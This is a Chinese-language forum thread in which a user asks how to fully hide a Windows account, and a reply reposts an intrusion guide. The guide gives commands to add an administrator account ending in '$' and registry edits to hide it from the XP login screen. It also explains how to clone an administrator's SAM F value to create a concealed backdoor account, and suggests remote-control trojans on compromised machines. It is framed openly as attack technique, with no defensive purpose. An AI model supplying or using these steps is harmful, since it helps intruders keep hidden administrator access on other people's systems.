真正的隐藏帐户

看了一个在windows中建立含“$”的隐藏帐户的教学片，学着做了一下，的确比较隐蔽，但是不是完全无迹可寻，比如在注册表里和在“Documents and Settings”目录里都会留下痕迹来。请问各位有此经验且有解决方法的达人们，有没有办法把这两个痕迹，尤其是“Documents and Settings”目录里的痕迹抹去。谢谢！

是不是我的问题有问题啊，为什么总是没有人回答呢？各位先知，帮帮我啊！

为什么没有人来帮我啊，大哥们伸出你们友好的手吧。

关于隐藏帐户

这篇文章主要是对入侵中建立隐藏帐户的手法进行一点介绍和讨论，技术含量低主要还是针对新手。

1： $利用
  一般在入侵时如果建立用户的话都会加上$，命令如下：
  
  C:\Documents and Settings\pwolf>net user w$ cool /add
命令成功完成。

  添加到管理员组:
C:\Documents and Settings\pwolf>net localgroup administrators w$ /add
命令成功完成。

在用户名后加上$，用net user命令是查不出来的，如下：
C:\Documents and Settings\pwolf>net user

\\PWOLF-E39196738 的用户帐户

-------------------------------------------------------------------------------
__vmware_user__       Administrator         Guest
HelpAssistant         SUPPORT_388945a0
命令成功完成。

而查询管理员组（刚才已提为管理员）是是可以看到的，如：
C:\Documents and Settings\pwolf>net localgroup administrators
别名   administrators
注释   管理员对计算机/域有不受限制的完全访问权

成员

-------------------------------------------------------------------------------
Administrator
pwolf
w$
命令成功完成。

例外：对于XP系统，即使用户名后加$,在登陆界面 也会显示我们建得用户，这里只要在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 下将我们所建用户的表项的DWORD值改为0 即可，如果没有没有这个项可以新建，这里就是w$了。
  
  在入侵XP系统时 ，最好不要添加用户，因为即使对方开启了终端服务（3389），XP也是不支持多用户的，还是开它的4899（RADMIN）或是灰鸽子等其他的远程控制软件。


2，网上流传的建立隐藏帐户的方法

  这种方法网上很多教程，这里也简单介绍。
  接上一步骤：

1。打开注册表编辑器（regedit），到HKEY_LOCAL_MACHINE\SAM\SAM 下 如果看不到子键，选中 HKEY_LOCAL_MACHINE\SAM\SAM然后右键-权限，将你所登陆的用户名添加进去，并且赋予完全控制权力。然后打开注册表（regedit)到HKLM\SAM\SAM\Domains\Account\Users中，这里保存里用户的信息，下面的十六进制项都是用户的sid，比如用户Administrator的sid是000001F4，guest的sid是000001F5。将相应的注册表项 w$,000003FA(w$对应的SID项），000003FB（管理员对应的注册表项,我用的是pwolf也是管理员身份）导出为w.reg，000003FA.reg,000003FB.reg,然后编辑REG文件将管理员（000003FB）的F值 覆盖000003FA的F值,后将000003FA.REG(修改完F值后的)的内容合并到W.REG.

附：对于修改注册表的访问权限的设置 ，在XP，2003里只要打开regedit就可以了再里面设置同上步骤，而对于2000要先打开regedt32给予SAM的访问权限，然后在打开注册表（REGEDIT）就可以看到SAM下的子键。

  2。删除用户W$. 命令：
    NET USER W$ /DEL .

    然后导入WOLF.REG。


这样建立的用户一开始在管理工具和命令行下都是看不到的,在注册表里还是能看到的（利用AFX Rootkit 2005可以隐藏，没有时间写以后再说

了）。但重启后在管理工具-计算机管理-本地用户和组里还是能看到的，具体分析看这篇文章http://www.cnhacker.com/bbs/read.php?

tid=25430&fpage=1（我在XP下测试是这种情况）

  还有一种情况就是这个用户在CMD 和计算机管理里 直接删是删不了, 提示:用户不属于这个组! 安全模式也是如此。 只能到

HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users 下将相关项删掉。
  在XP里这种方法即使不修改HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList

下我们所建用户的表项的DWORD值，在登陆界面也不会显示的

网上转帖的，希望对楼主有所帮助

十分有用，非常感谢“风的使者”,请问能不能让账户的用户文件夹在Documents and Settings内不显示出来？或者是根本没有。还请赐教，再次感谢！